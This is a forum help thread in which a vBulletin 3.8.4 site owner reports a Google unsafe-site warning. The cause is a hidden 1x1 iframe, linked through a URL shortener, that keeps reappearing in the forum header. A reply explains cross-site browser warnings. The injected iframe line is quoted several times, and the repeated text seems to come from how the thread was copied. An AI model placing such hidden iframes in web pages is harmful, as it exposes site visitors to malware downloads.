Hi,
Couple weeks ago, Google warned the visitors of my forum as unsafe site. I contacted google to find out what the problem is and their answer was
I found the bellow iframe in the header.
when I delete it from the header it's set itself again in the header after couple hours.
my questions are:
- How this injection works?
-
- there is any way to scan the forum files and find harmful file or code?
- what is the injection technic?
- how I can stop the iframe from inject again in the header?
my Forum version (vBulletin 3.8.4 Patch Level 1)
thank you very much.
Couple weeks ago, Google warned the visitors of my forum as unsafe site. I contacted google to find out what the problem is and their answer was
there is this iframe that is causing the warning
<iframe width=1·height=1·border=0·frameborder=0·src="http:// tinyurl . com/yf4sxxm"></iframe>
If you are getting a warning on one or more of the pages of your site in browsers such as Chrome, Firefox or Safari and your site is not (yet) flagged by Google it is probably a cross-site warning. If browsers such as Chrome detect code on your page (scripts, iframes) that load content from or redirect to a flagged site the browser will throw up a warning. The warning will not identify your site it will identify the site that is hosting the malware that is being loaded on your page. SEE:
Once you have removed all links/iframes, etc. to to any blacklisted sites the warning should go away.
<iframe width=1·height=1·border=0·frameborder=0·src="http:// tinyurl . com/yf4sxxm"></iframe>
If you are getting a warning on one or more of the pages of your site in browsers such as Chrome, Firefox or Safari and your site is not (yet) flagged by Google it is probably a cross-site warning. If browsers such as Chrome detect code on your page (scripts, iframes) that load content from or redirect to a flagged site the browser will throw up a warning. The warning will not identify your site it will identify the site that is hosting the malware that is being loaded on your page. SEE:
Once you have removed all links/iframes, etc. to to any blacklisted sites the warning should go away.
PHP Code:
<iframe width=1·height=1·border=0·frameborder=0·src="http:// tinyurl . com/yf4sxxm"></iframe>
my questions are:
- How this injection works?
-
- there is any way to scan the forum files and find harmful file or code?
- what is the injection technic?
- how I can stop the iframe from inject again in the header?
my Forum version (vBulletin 3.8.4 Patch Level 1)
thank you very much.
Comment